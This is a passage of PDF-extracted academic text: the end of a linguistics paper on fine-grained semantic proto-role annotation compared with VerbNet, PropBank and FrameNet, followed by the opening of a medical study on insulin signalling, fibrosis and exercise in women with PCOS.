argument IDs 0 and 1 are most likely to be AGENT and PA- TIENT): our stratification aimed to survey across both “core” and “peripheral” argument role types. 482 0 1 2 3 0 200 400 600 800 Rank lo g1 0( F re qu en cy ) Figure 7: Distribution of property configurations in ex- periment 2. To obtain categorical roles for purposes of comparison, responses of 2/4 were mapped to 1/5, giv- ing configurations on 11 properties over what we might coarsely consider: {False (1), Unknown (3), True (5)}. achieving a Kappa score of 0.619 with the annota- tor. Two colleagues generally familiar with thematic roles but without prior experience with the protocol or our goals achieved scores of 0.594 and 0.642. Fi- nally, a colleague who speaks English as a second language acheived a Kappa score of 0.479. These correlations, along with our initial selection criteria for the annotator, and then combined with those cor- relations observed in Table 6 (discussed below), sug- gests our process resulted in a useful resource which we will release to the community. In section 6 we additionally provide a qualitative indicator of annotation quality, in the form of an alignment to VerbNet roles. 6 Comparison to Other Rolesets A prediction emerging from the proto-role hypoth- esis is that, when a set of role-relevant properties such as those in Table 2 are tested on a large scale, we should not find clean role-clusters. We do ex- pect to find certain common role-types appearing frequently, but we also expect there to be a long tail of combinations of properties. This is exactly what we find when examining our results. Figure 6 shows the frequency of property configurations in the data set. Around 800 configurations are attested, with nearly 75% of those making up the tail. The proto-role hypothesis predicts that there are natural sentences in which an argument can be AGENT/PATIENT-like, yet be missing one or more Proto-agent/patient properties. This is what gives rise to the observed long tail of property configu- rations: cases that would otherwise be lumped to- gether as, e.g., AGENT, are instead placed in a more diverse set of bins. While Dowty’s theory is really about roles at the type-level, these bins are also use- ful for understanding role annotations at the token level, i.e. capturing exactly those properties that hold of the given argument in context. Table 4 shows three real-world sentences taken from the Wall Street Journal involving the verb kill. Each sentence has what PropBank would call a KILL.01, ARG0-PAG, or the first argument of the roleset KILL.01, a particular sense of the word kill.13 Further, each of these arguments are labeled as a VerbNet AGENT and FrameNet KILLER/CAUSE through SemLink. These sentences were selected purely because they were the only instances of kill in our dataset with SemLink role annotations. Then, when examining our annotations for these argu- ments, we find that our motivations from §3 for this enterprise are justified. At the token level, there are robust inferences leading to different results on each example for key proto-role properties, but in each case the subject is still a better Proto-agent than the object. From this triplet, we learn that the subject of kill needn’t be volitionally involved (as in the acci- dental death in A), needn’t be aware of the killing, and even need not be sentient. The present anno- tation scheme, in contrast to the coarse label pro- vided to these examples in VerbNet, captures this variation while still allowing inference to type-level properties of the verb kill. (These examples also clearly illustrate the degree to which noun seman- tics can influence thematic role-related judgments when carried out on natural data, something the fine- grained approach allows us to explore directly.) We can also clearly see from this triplet that INSTIGA- TION is constant across examples, as is PHYSICAL EXISTENCE. Interestingly, the example (B) shows that killing does not even preclude the continuation 13 PAG is a recent addition to PropBank semantics, standing for Proto-Agent but interpreted as an unweighted disjunction of features: “it acts volitionally, is sentient, or perceives, causes a changes of state, or moves” (Kübler and Zinsmeister, 2015). Another addition, PPT, stands for Proto-Patient. While moti- vated by Dowty’s terminology, these additions do not capture the individual property-based notion we advocate for here. 483 Sentences Property (A) (B) (C) (A) She was untrained and, in one botched job killed a client. instigated 5 5 5 (B) The antibody then kills the cell. volitional 2 1 5 (C) An assassin in Colombia killed a federal judge on a Medellin street. awareness 3 1 5 PropBank KILL.01, ARG0-PAG: killer sentient 5 1 5 VerbNet MURDER-42.1-1, AGENT: ACTOR in an event who initiates and carries out the event intentionally or consciously, and who exists independently of the event moved 3 3 3 phys existed 5 5 5 created 1 1 1 destroyed 1 3 1 FrameNet KILLING, KILLER/CAUSE: (The person or sentient entity) / (An inanimate entity or process) that causes the death of the VICTIM. changed poss 1 1 1 changed state 3 3 3 stationary 3 3 3 Table 4: Comparison of role annotations for kill across resources. Ratings: 1=very unlikely, 5=very likely. Sentences Property (A) (B) (C) (A) The stock split four-for-one on Oct. 10. instigated 1 1 1 (B) “In 1979, the pair split the company in half, with Walter and his son, Sam, agreeing to operate under the Merksamer Jewelery name.” volitional 1 1 1 awareness 1 5 1 (C) The company downplayed the loss of Mr. Lesk and split his merchandising responsibilities among a committee of four people. sentient 1 1 1 moved 1 1 1 PropBank SPLIT.01, ARG1-PPT: thing being divided phys existed 1 1 1 VerbNet SPLIT-23.2, PATIENT: UNDERGOER in an event that experiences a change of state, location or condition, that is causally involved or directly affected by other participants, and exists independently of the event. created 1 1 1 destroyed 1 5 1 changed poss 1 5 5 FrameNet CAUSE TO FRAGMENT, WHOLE PATIENT: The entity which is destroyed by the AGENT and that ends up broken into PIECES. changed state 5 5 4 stationary 1 1 1 Table 5: Comparison of role annotations for split across resources. of existence after the event, so the EXISTENCE prop- erty may not be fully independent. Table 5 makes a similar point using the verb split. These three instances of split, labeled with the same role (and verb sense) in PropBank/VerbNet, show clear differences in terms of fine-grained role prop- erties. (Note also that in (A), a PropBank ARG1 ap- pears in subject position.) While there is consensus on CHANGE OF STATE, there is variation in whether the argument is DESTROYED, CHANGES POSSES- SION, and is AWARE of its involvement in the event. Alignment with VerbNet In what follows we ex- plore a non-exact mapping where we have taken sen- tences in SemLink annotated with VerbNet coarse- grain roles, and simply projected the mean 1-5 proto-role ratings (subtracting N/A) onto each role. This serves two purposes: (1) the quality of this mapping serves to verify the quality of the proto- role annotations, and (2) this alignment helps com- pare between coarse and fine-grained role annota- tions. This alignment is a proof-of-concept, and we leave a deeper exploration of ways of doing this sort of alignment for the future. Table 6 shows the full alignment. A value of 5 indicates that the role tends to determine the proto-property positively, i.e. AGENTS are extremely likely to be judged as insti- gators. A value close to 3 indicates that the role is neutral with respect to the proto-property, e.g. AGENTS may or may not move. A value close to 1 indicates that the arguments with that role are likely to have the negative version of the proto-property, e.g. AGENTS tend not to CHANGE POSSESSION. At a broad level the results are strong, though we will not be able to discuss every detail here. In this alignment the judgments of N/A have been removed.14 In the case of e.g. the INSTIGATION value for THEME, this supports interpreting the role as assigning no value to instigation at all; similarly for some of the other values for THEME. In some 14This is not the only way to treat N/A ratings, and we will leave a full exploration to future work. 484 Role Freq instigated volitional awareness sentient moved existed created destroyed chg poss chg state stationary Agent 1546 4.9 (1355) 4.8 (1273) 4.9 (1275) 4.8 (810) 3.1 (897) 4.7 (947) 1.1 (1413) 1.1 (1508) 1.7 (432) 3.3 (1489) 2.8 (874) Theme 1153 3.4 (214) 3.9 (215) 4.6 (226) 4.7 (147) 3.6 (335) 4.3 (412) 1.9 (986) 1.3 (1037) 3.3 (339) 3.9 (999) 2.5 (300) Patient 312 3.1 (77) 3.2 (80) 4.5 (85) 4.4 (47) 3.3 (75) 4.6 (100) 1.1 (285) 1.6 (293) 3.4 (99) 4.5 (294) 2.7 (69) Experiencer 210 4.4 (161) 4.3 (167) 4.9 (169) 4.8 (128) 3.1 (135) 4.7 (139) 1.0 (195) 1.1 (204) 1.4 (41) 3.6 (204) 2.8 (137) Stimulus 129 4.3 (64) 4.0 (33) 4.1 (35) 4.2 (26) 2.9 (35) 3.7 (42) 1.7 (107) 1.1 (114) 1.8 (20) 3.1 (115) 2.9 (32) Topic 114 4.0 (2) 2.3 (3) 2.5 (4) 3.5 (4) 3.0 (4) 3.0 (7) 2.0 (92) 1.1 (91) 2.6 (18) 3.4 (74) 3.0 (3) Destination 91 1.6 (5) 2.9 (15) 4.5 (16) 4.8 (8) 2.3 (24) 4.9 (48) 1.5 (74) 1.2 (75) 2.2 (22) 4.2 (75) 4.1 (39) Recipient 88 1.4 (37) 3.6 (58) 4.8 (60) 4.9 (35) 3.0 (46) 4.5 (52) 1.5 (84) 1.0 (85) 2.3 (30) 3.7 (82) 3.0 (40) Extent 87 — (0) — (0) — (0) — (0) — (0) — (0) 1.0 (1) 1.0 (2) — (0) 3.0 (1) — (0) ... 12 roles omitted ... Instrument 16 4.4 (9) 4.5 (8) 4.5 (8) 5.0 (4) 3.8 (5) 4.3 (7) 1.3 (15) 1.0 (15) 1.3 (6) 3.3 (13) 2.0 (4) Initial Loc. 15 2.2 (5) 2.3 (7) 4.2 (8) 3.5 (2) 2.5 (4) 3.0 (4) 1.0 (14) 2.1 (14) 1.8 (6) 4.2 (13) 2.3 (3) Beneficiary 13 3.6 (5) 5.0 (5) 5.0 (5) 5.0 (1) 3.0 (1) 3.5 (4) 2.2 (10) 1.0 (13) 3.0 (4) 3.7 (13) 3.0 (1) Material 9 5.0 (1) 5.0 (1) 5.0 (2) 5.0 (1) 3.7 (3) 5.0 (3) 1.0 (7) 1.2 (8) 5.0 (1) 3.7 (7) 1.7 (3) Predicate 8 — (0) 5.0 (1) 5.0 (1) — (0) — (0) — (0) 1.0 (8) 2.2 (8) — (0) 3.4 (5) — (0) Asset 7 — (0) — (0) — (0) — (0) 3.0 (1) 3.0 (1) 1.0 (5) 1.0 (6) 5.0 (1) 4.3 (3) — (0) Table 6: High and low frequency VerbNet roles (via SemLink) aligned with mean property ratings when excluding N/A judgments. Freq provides the number of annotations that overlapped with a role. In parenthesis is the number of cases for that property which were judged applicable (not N/A). E.g. we annotated 1,546 arguments that SemLink calls AGENT, where 1,355 of those were deemed applicable for the instigation property, with a mean response of 4.9. 12 mid-frequency roles are omitted here for space reasons; the full alignment is provided with the dataset for this paper. cases with large numbers of N/A responses, e.g. the awareness and sentient properties for THEME, the provided mean is high, suggesting the role may be more heterogeneous than would otherwise appear. In lieu of an exhaustive discussion, we will moti- vate the alignment with several interesting examples of AWARENESS. AWARENESS tended to be rated highly. Table 7 gives a range of examples illustrat- ing particular tokens of judgements relative to Verb- Net roles. In (A-C) we give three straightforward examples where the bolded argument was judged to be aware of involvement in the event. Abstract enti- ties such as companies were consistently annotated as having the potential to be aware. Consequently, in B for example, Ford is annotated as being aware that Mazda makes the Tracer for the company. In these cases, it is intuitively right at the token level that the participant is likely to be aware of their involvement in the event, but this does not mean that we can con- clude anything about the role; for example, for BEN- EFICIARIES and INSTRUMENTS we have only a few examples of the AWARENESS property. In C-E, we have given three examples of different ratings for AWARENESS focusing on the DESTINA- TION role. All three ratings are intuitively straight- forward at the token level; in D the recipient of the cases (the court) may not yet be aware of the deci- sion. In E the recipient of the sprinkling was a baby and therefore was quite unlikely to be aware of her Rtg (Role) Example A 5 (AGENT) They worry about their careers, drink too much and suffer [...] B 5 (BENEFICIARY) Mazda makes the Tracer for Ford. C 5 (DESTINATION) Commercial fishermen and fish processors filed suit in federal court [...] D 3 (DESTINATION) But the court [...] sent the cases back to fed- eral district court in Dallas. E 1 (DESTINATION) When the good fairy [...] hovered over the cradle of Edita [...], she sprinkled her with high E flats, [...] F 5 (INSTRUMENT*) Guests bring movies on tape , and show their favorite three-to-five minute segments on the screen [...] Table 7: Examples of AWARENESS: how likely is it that the bold argument is aware of being involved in the event? potential future singing career (a fact about the con- text and argument more than the verb). F helps illus- trate the quality of our annotations: personal com- munication with SemLink researchers verified that we discovered a rare bug via our process.15 7 Semantic Proto-Role Labeling SRL systems are trained to predict either: (i) a predicate or frame specific notion of role (e.g., FrameNet), or (ii) a cross-predicate, shared notion of role (e.g., PropBank). (i) allows for fine-grain distictions specific to a single predicate, but risks data sparsity (needing many examples per predi- cate). (ii) allows for sharing statistics across pred- icates, but requires careful, manual cross-predicate 15The role via SemLink should be AGENT. 485 instigated volitional awareness sentient moved Null 57.4 59.0 58.4 74.0 64.1 Pos 79.0 74.9 75.5 74.1 64.1 Full 82.9 74.9 75.5 75.2 67.1 existed created destroyed chg poss chg state stationary 57.8 69.4 80.4 72.4 45.9 65.0 59.7 69.6 80.7 72.4 46.5 65.1 64.8 72.0 82.3 72.3 58.0 69.0 Table 8: Test classification accuracies for each property. analysis to ensure equivalent role-semantics (Loper et al., 2007), and as in seen Tables 4 and 5 it may not be feasible to ensure exact equivalence. Our approach addresses this challenge by drop- ping the notion of categorical role entirely, replacing it with responses to proto-role questions that can be shared across all arguments16 and predicates.17 Fur- ther, as likelihood judgements may be interpreted as scalars, then this may provide a smoother represen- tation for prediction and downstream use, akin to the recent push to replace categorical “1-hot” word rep- resentations with vector-space models. As an example SPRL model, we trained separate log-linear classifiers with L2 regularization on the judgments of each property in the results from Ex- periment 2. As in Fig. 6 we collapsed ratings to a categorical {1,3,5}, and included N/A, for a resul- tant 4-way classification problem.18 The 9,778 ar- guments that appear in the dataset were divided into training (7,823), development (978), and test (977). We trained three models: Null, with only an intercept feature19; Pos, which adds as a feature the linear offset of the argument relative to the verb (as a coarse proxy for syntactic structure); and Full, which added a vector embedding of the verb (Rastogi et al., 2015).20 Even with this basic model we see evidence of learning property-specific distributions across verbal predicates, such as for CHANGED STATE. 16E.g., the notions of ACTOR, AGENT, and even PATIENT may overlap in their underlying properties. 17E.g., the proto-Agent of build will be related but not identi- cal to that of kill: where commonalities exist, predictive models can benefit from the overlap. 18Future work on prediction may explore alternative formu- lations, such as a 2-step process of first predicting N/A, then performing regression on likelihood. 19The Null classifier predicts a rating of 1 for CREATED and DESTROYED and N/A for all the other properties. 20http://cs.jhu.edu/˜prastog3/mvlsa/ 8 Conclusions and Future Work In this paper we have adopted from theoretical lin- guistics the idea that thematic roles should be de- composed into more fine-grained properties that have a prototype structure – the Proto-role Hypoth- esis. We developed an annotation task based on this idea, and tested it both in a smale scale nonce-based version and a very large scale version using real data from PropBank(/WSJ). One main result is that the proto-role hypothesis holds true at this very large scale. A second result is that, at this scale we gain evidence for a substantial amount of ‘role fragmen- tation’ in the lexicon of English: we find approx- imately 800 discrete property configurations. The proto-role approach allows us to cope with fragmen- tation by focusing on the fine-grained properties that make up roles. We showed this allows a greater de- gree of accuracy in role annotations, for example handling variability in fine-grained properties across tokens of a verb in a corpus that lead to coarse- grained categorization challenges. Finally, we have shown it practical to directly annotate a corpus with fine-grained properties and produced a large collec- tion of such annotations, which we release to the community. We are currently expanding the annota- tion set beyond WSJ, and beyond English, as well as applying it to theoretical questions about verb class and argument structure (Davis and Koenig, 2000; Kako, 2006b), along with word sense. Finally, we are building on the baseline model in §7 to more broadly investigate how decompositional semantic annotations can guide linguistically motivated rep- resentation learning of meaning. Acknowledgments Great thanks to Martha Palmer, Tim O’Gorman, Scott Grimm, and the reviewers for their feedback; Robert Busby for annotations; Julian Grove for work on a predecessor project with Kyle Rawlins. Thanks to Sanjeev Khudanpur, John J. Godrey, and Jan Hajic̆, as well as JHU and Charles University for coor- dinating the Fred Jelinek Memorial Workshop in 2014, supported by NSF PIRE (0530118). Support came from an NSF Graduate Research Fellowship, DARPA DEFT FA8750-13-2-001 (Large Scale Paraphrasing for Natural Language Understanding), the JHU HLTCOE, the Paul Allen Institute of Artificial Intelligence (Acquisition and Use of Paraphrases in a Knowledge-Rich Setting), and NSF BCS-1344269 (Gradient Symbolic Computation). 486 http://cs.jhu.edu/~prastog3/mvlsa/ References Afra Alishahi and Suzanne Stevenson. 2010. A compu- tational model of learning semantic roles from child- directed language. Language and Cognitive Pro- cesses, 25(1):50–93. Collin F. Baker, Charles J. Fillmore, and John B. Lowe. 1998. The Berkeley FrameNet project. In Proceed- ings of the International Conference on Computational Linguistics, pages 86–90. Collin Baker, Michael Ellsworth, and Katrin Erk. 2007. Semeval’07 task 19: Frame semantic structure extrac- tion. In Proceedings of the 4th International Workshop on Semantic Evaluations, pages 99–104. Association for Computational Linguistics. Frank R. Blake. 1930. A semantic analysis of case. In James T. Hatfield, Werner Leopold, and A. J. Friedrich Ziglschmid, editors, Curme volume of linguistic stud- ies, pages 34–49. Linguistic Society of America. Claire Bonial, William Corvey, Martha Palmer, Volha V. Petukhova, and Harry Bunt. 2011. A hierarchical uni- fication of LIRICS and VerbNet semantic roles. In Se- mantic Computing (ICSC), 2011 Fifth IEEE Interna- tional Conference on, pages 483–489, September. Greg N. Carlson and Michael K. Tanenhaus. 1988. Thematic roles and language comprehension. In W. Wilkins, editor, Syntax and Semantics: Thematic Relations. Academic Press. Greg N. Carlson. 1984. Thematic roles and their role in semantic interpretation. Linguistics, pages 259–279. Xavier Carreras and Lluı́s Màrquez. 2005. Introduction to the CoNLL-2005 shared task: Semantic role label- ing. In Proceedings of the Ninth Conference on Com- putational Natural Language Learning, pages 152– 164. Association for Computational Linguistics. Hector-Neri Castañeda. 1967. Comments on Donald Davidson’s ‘The logical form of action sentences’. In Nicholas Rescher, editor, The Logic of Decision and Action. University of Pittsburgh Press. Noam Chomsky. 1981. Lectures on government and binding. Foris Publications. W. Croft. 1991. Syntactic categories and grammatical relations. University of Chicago Press. D. Cruse. 1973. Some thoughts on agentivity. Journal of Linguistics, 9:1–204. Dipanjan Das, Nathan Schneider, Desai Chen, and Noah A. Smith. 2010. Probabilistic frame-semantic parsing. In Proceedings of Human Language Tech- nologies Conference of the North American Chapter of the Association for Computational Linguistics, pages 948–956. A. R. Davis and J.-P. Koenig. 2000. Linking as con- straints on word classes in a hierarchical lexicon. Lan- guage, 76:56–91. David Dowty. 1989. On the semantic content of the notion ‘thematic role’. In Barbara Partee, Gennaro Chierchia, and Ray Turner, editors, Properties, types and meanings, vol II. Kluwer. David Dowty. 1991. Thematic proto-roles and argument selection. Language, 67(3):547–619. Christiane Fellbaum. 1998. WordNet. Wiley Online Li- brary. Charles Fillmore. 1966. Towards a modern theory of case. The Ohio State University project on linguistic analysis report 13, The Ohio State University. Charles J. Fillmore. 1976. Frame semantics and the na- ture of language. In Annals of the New York Academy of Sciences: Conference on the Origin and Develop- ment of Language and Speech, volume 280, pages 20– 32. Charles Fillmore. 1982. Frame semantics. Linguistics in the morning calm, pages 111–137. Daniel Gildea and Daniel Jurafsky. 2002. Automatic la- beling of semantic roles. Computational Linguistics, 28(3):245–288. Scott Grimm. 2005. The lattice of case and agentivity. MSc thesis, University of Amsterdam. Scott Grimm. 2011. Semantics of case. Morphology, 21:515–544. Jeffrey S. Gruber. 1965. Studies in lexical relations. Ph.D. dissertation, Massachusetts Institute of Technol- ogy. Patrick Hanks. 2013. Lexical Analysis: Norms and Ex- ploitations. MIT Press. Joshua K. Hartshorne, Claire Bonial, and Martha Palmer. 2014. The VerbCorner Project: Findings from Phase 1 of crowd-sourcing a semantic decomposition of verbs. In Proceedings of the Annual Meeting of the Associ- ation for Computational Linguistics, pages 397–402. Association for Computational Linguistics. Joshua Hartstone, Claire Bonial, and Martha Palmer. 2013. The VerbCorner project: Toward an empirically-based semantic decomposition of verbs. In Proceedings of the Conference on Empirical Meth- ods in Natural Language Processing, pages 1438– 1442. Geoffrey E. Hinton. 1981. Implementing semantic net- works in parallel hardware. In Geoffrey E. Hinton and John A. Anderson, editors, Parallel Models of Asso- ciative Memory. Erlbaum, Hillsdale, NJ. Geoffrey E. Hinton. 1986. Learning distributed repre- sentations of concepts. In Proceedings of the Eighth Annual Conference of the Cognitive Science Society, pages 1–12. Amherst, MA. Ray S. Jackendoff. 1972. Semantic Interpretation in Generative Grammar. The MIT Press. Ray S. Jackendoff. 1987. The status of thematic relations in linguistic theory. Linguistic Inquiry, 18:369–411. 487 Edward Kako. 2006a. The semantics of syntactic frames. Language and Cognitive Processes, 21(5):562–575. Edward Kako. 2006b. Thematic role properties of sub- jects and objects. Cognition, 101:1–42. Sandra Kübler and Heike Zinsmeister. 2015. Cor- pus Linguistics and Linguistically Annotated Corpora. Bloomsbury Publishing. Beth Levin and Malka Rappaport Hovav. 2005. Argu- ment Realization. Cambridge University Press. Beth Levin. 1993. English Verb Classes and Alter- nations: A Preliminary Investigation. University of Chicago Press. Ken Litkowski. 2004. Senseval-3 task: Automatic label- ing of semantic roles. In Senseval-3: Third Interna- tional Workshop on the Evaluation of Systems for the Semantic Analysis of Text, pages 141–146. Edward Loper, Szu-Ting Yi, and Martha Palmer. 2007. Combining lexical resources: Mapping between prop- bank and verbnet. In Proceedings of the 7th Interna- tional Workshop on Computational Linguistics. Mitchell P Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. James L. McClelland and Alan H. Kawamoto. 1986. Mechanisms of sentence processing: Assigning roles to constituents. In David E. Rumelhart and James L. McClelland, editors, Parallel Distributed Processing: Explorations in the Microstructure of Cognition, Vol. 2. MIT Press, Cambridge, MA. Martha Palmer, Dan Gildea, and Paul Kingsbury. 2005. The proposition bank: A corpus annotated with se- mantic roles. Computational Linguistics, 31:71–106. Terence Parsons. 1990. Events in the Semantics of En- glish. MIT Press, Cambridge, MA. James Pustejovsky, Patrick Hanks, and Anna Rumshisky. 2004. Automated induction of sense in context. In Proceedings of the International Conference on Com- putational Linguistics. Malka Rappaport and Beth Levin. 1988. What to do with theta roles. In W. Wilkins, editor, Syntax and seman- tics 21: Thematic Relations, pages 7–36. Academic Press. Malka Rappaport Hovav and Beth Levin. 1998. Building verb meanings. In M. Butts and W. Geuder, editors, The Projection of Arguments: Lexical and Composi- tional Factors, pages 97–134. CSLI Publications. Pushpendre Rastogi, Benjamin Van Durme, and Raman Arora. 2015. Multiview LSA: Representation learn- ing via generalized CCA. In Proceedings of the An- nual Meeting of the North American Chapter of the Association for Computational Linguistics. Karin Kipper Schuler. 2005. VerbNet: A broad cover- age, comprehensive verb lexicon. Ph.D. dissertation, University of Pennsylvania. Leonard Talmy. 1978. Figure and ground in complex sentences. In Joseph Greenberg, editor, Universals of Human Language, pages 625–649. Stanford Univer- sity Press. Ralph Weischedel, Martha Palmer, Mitchell Marcus, Ed- uard Hovy, Sameer Pradhan, Lance Ramshaw, Ni- anwen Xue, Ann Taylor, Jeff Kaufman, Michelle Franchini, Mohammed El-Bachouti, Robert Belvin, and Ann Houston. 2013. Ontonotes release 5.0 LDC2013T19. Linguistic Data Consortium, Philadel- phia, PA. 488 work_dqn2txozcvhufgeljzjxcvc7mu ---- 9:4 346–359N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle RESEARCH Exercise and insulin resistance in PCOS: muscle insulin signalling and fibrosis N K Stepto1,2,3,4,*, D Hiam1,*, M Gibson-Helm2, S Cassar1, C L Harrison2, S K Hutchison2, A E Joham2, B J Canny5, A Moreno-Asso1,3, B J Strauss6,7, N Hatzirodos8, R J Rodgers8 and H J Teede2,9 1Institute for Health and Sport, Victoria University, Melbourne, Victoria, Australia 2Monash Centre for Health Research and Implementation, Monash University, Clayton, Victoria, Australia 3Australian Institute for Musculoskeletal Science, Victoria University, Melbourne, Victoria, Australia 4Medicine-Western Health, Faculty of Medicine, Dentistry and Health Science, Melbourne University, Melbourne, Victoria, Australia 5School of Medicine, University of Tasmania, Hobart, Tasmania, Australia 6Department of Medicine, School of Clinical Sciences, Monash University, Clayton, Victoria, Australia 7Division of Diabetes, Endocrinology & Gastroenterology, School of Medical Sciences, Faculty of Biology, Medicine and Health, The University of Manchester, Manchester, UK 8The Robinson Research Institute, School of Medicine, The University of Adelaide, Adelaide, Australia 9Diabetes and Endocrine Units, Monash Health, Clayton, Victoria, Australia Correspondence should be addressed to D Hiam: Danielle.hiam@vu.edu.au *(N K Stepto and D Hiam contributed equally to this work) Abstract Objective: Mechanisms of insulin resistance in polycystic ovary syndrome (PCOS) remain ill defined, contributing to sub-optimal therapies. Recognising skeletal muscle plays a key role in glucose homeostasis we investigated early insulin signalling, its association with aberrant transforming growth factor β (TGFβ)-regulated tissue fibrosis. We also explored the impact of aerobic exercise on these molecular pathways. Methods: A secondary analysis from a cross-sectional study was undertaken in women with (n = 30) or without (n = 29) PCOS across lean and overweight BMIs. A subset of participants with (n = 8) or without (n = 8) PCOS who were overweight completed 12 weeks of aerobic exercise training. Muscle was sampled before and 30 min into a euglycaemic-hyperinsulinaemic clamp pre and post training. Results: We found reduced signalling in PCOS of mechanistic target of rapamycin (mTOR). Exercise training augmented but did not completely rescue this signalling defect in women with PCOS. Genes in the TGFβ signalling network were upregulated in skeletal muscle in the overweight women with PCOS but were unresponsive to exercise training except for genes encoding LOX, collagen 1 and 3. Conclusions: We provide new insights into defects in early insulin signalling, tissue fibrosis, and hyperandrogenism in PCOS-specific insulin resistance in lean and overweight women. PCOS-specific insulin signalling defects were isolated to mTOR, while gene expression implicated TGFβ ligand regulating a fibrosis in the PCOS-obesity synergy in insulin resistance and altered responses to exercise. Interestingly, there was little evidence for hyperandrogenism as a mechanism for insulin resistance. -19-0551 Key Words f mechanistic target of rapamysin (mTOR) f typical and atypical protein kinase C f transforming growth factor β receptor 2 (TGFBRII) f collagen f treadmill exercise training f high intensity interval training f hyperandrogenism Endocrine Connections (2020) 9, 346–359 ID: 19-0551 9 4 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access mailto:Danielle.hiam@vu.edu.au https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 347 PB–XX 9:4 Introduction Polycystic ovary syndrome (PCOS) affects 8–13% of women of reproductive age (1) has major metabolic (increased type 2 diabetes mellitus (T2D) and cardiovascular risk factors) (2, 3, 4), reproductive (leading cause of anovulatory infertility) (5, 6) and psychological (anxiety and depression) (7) impacts, representing a substantial health burden. Despite its high prevalence, the aetiology and ideal therapies for PCOS remain unclear (8). Insulin resistance is a central characteristic (9, 10), driving both hyperandrogenism and clinical features. The risk of T2D in PCOS is increased 4.4-fold independent of BMI (3, 4, 11) accounting for 23% of T2D in young women (12); yet, the underlying mechanisms of insulin resistance in PCOS remain ill defined (8, 13). Therapeutic strategies in PCOS include medical therapy (metformin) and weight management via diet and exercise (6, 14, 15), which reduce but not reverse insulin resistance and fail to optimally treat PCOS. In this context, greater insight into aetiology of insulin resistance in PCOS is needed. Based on euglycaemic-hyperinsulinaemic clamp data, prevalence of insulin resistance has been reported in up to 95% of women with PCOS as diagnosed by Rotterdam criteria (9). PCOS has a unique PCOS- related insulin resistance (intrinsic insulin resistance) as 75% of lean PCOS are insulin resistant, compared to lean women without PCOS. This insulin resistance is exacerbated by obesity (extrinsic insulin resistance (9, 10, 13)). Intrinsic insulin resistance in PCOS is likely due to a dysfunctional response to insulin in metabolically active peripheral tissues including adipose tissue and skeletal muscle (8, 13). As skeletal muscle accounts for 70–80% of insulin-stimulated glucose uptake (16) defects may have profound effects on whole body insulin sensitivity. Reduced insulin sensitivity in skeletal muscle has well-established mechanisms including defective insulin signalling (17, 18), with reduced activation of key signalling proteins such as insulin receptor substrate (IRS)1/2, protein kinase B (PKB)/Akt and its downstream substrate Akt substrate 160KDa (AS160) (17, 18, 19). While similar defects in insulin stimulated signalling have been found in women with PCOS (13, 20), these signalling defects are not consistent (21) and unable to explain the PCOS-specific IR. Raja-Khan et al. (22) has proposed an alternative hypothesis that dysfunctional transforming growth factor β (TGFβ) signalling regulated by fibrillins and latent TGFβ-binding proteins may lead to increased organ stroma or fibrosis. This may predispose women with PCOS to morbidities like insulin resistance, as TGFβ can directly impact glucose uptake and insulin signalling (23, 24, 25) and/or create a physical barrier to glucose uptake into muscle (26). The role of aberrant extracellular matrix (ECM) remodelling or tissue fibrosis and TGFβ in the aetiology of PCOS-related insulin resistance has not been investigated. We therefore hypothesised that the women with PCOS compared to BMI-matched controls would be associated with unique defects in insulin signal transduction and altered ECM and TGFβ signalling network gene expression. We aimed to examine the activation/phosphorylation of proteins in both the proximal and distal parts of the insulin signalling cascade before and 30 min into a euglycaemic–hyperinsulinaemic insulin clamp and gene expression of the ECM and TGFβ ligand signalling network in women with or without PCOS (spanning lean and obese BMIs). Our secondary aim was to investigate the impact of exercise training on the aberrant skeletal muscle insulin signalling and gene expression of the ECM and TGFβ ligand signalling network. Materials and methods Participants The participants that are included in this secondary analysis are a subset of women who participated in our previously published studies (9, 27, 28, 29) and consented to muscle biopsies. Specifically, we included fifty-nine (Fig. 1 and Table 1) of the original cohort of premenopausal women with or without PCOS. The women were categorised according to PCOS status and matched (group means) for BMI generating four groups: (i) lean with PCOS (LP), (ii) lean without (control; LC), (iii) overweight to obese with PCOS (OWP) and (iv) overweight to obese without PCOS (control; OWC). Confirmation of PCOS diagnosis was undertaken by expert endocrinologists (SKH, AEJ and HJT) based on Rotterdam criteria. The Southern Health Research Advisory and Ethics Committee approved the study and participants gave written informed consent. The clinical trial registration number is ISRCTN84763265. Study design For this ancillary mechanistic observational study and interventional sub-study (Fig. 1) data were collected This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3489:4 at baseline in all women (after three-month washout of relevant medications) and following 12 weeks of exercise training (subgroup of women with overweight/ obesity n = 8 per group). Data were collected in the follicular phase of the menstrual cycle in control women and wherever feasible in the women with PCOS. End- point analyses were done by staff blinded to group and intervention stage. Exercise intervention The subgroup of overweight to obese participants consisting of women with PCOS (n = 8) and without PCOS (controls; n = 8) undertook 12 weeks of supervised, personalised progressive, aerobic exercise training on a motorised treadmill as described previously. Briefly, participants attended three 1 h sessions each week, which sequentially alternated between moderate-intensity (walking or jogging at 70% of VO2peak or 75–85% HRmax) and high-intensity interval training (six 5-min intervals with 2-min recovery period at approximately 95–100% of VO2peak or approximately 95–100% HRmax). The intensity and/or duration of each participant’s exercise session were individually progressed and increased over the duration of the intervention (28, 29, 30). Clinical and biochemical measurements Participants were assessed for anthropometric measures including body weight, height, body composition, abdominal visceral fat and subcutaneous fat and, waist, and hip circumference as Table 1. Insulin sensitivity was determined using the euglycaemic-hyperinsulinaemic clamp technique (40 mU/m2/min) as previously reported (9). Blood samples were batch analysed for fasting glucose, total cholesterol, high-density lipoprotein 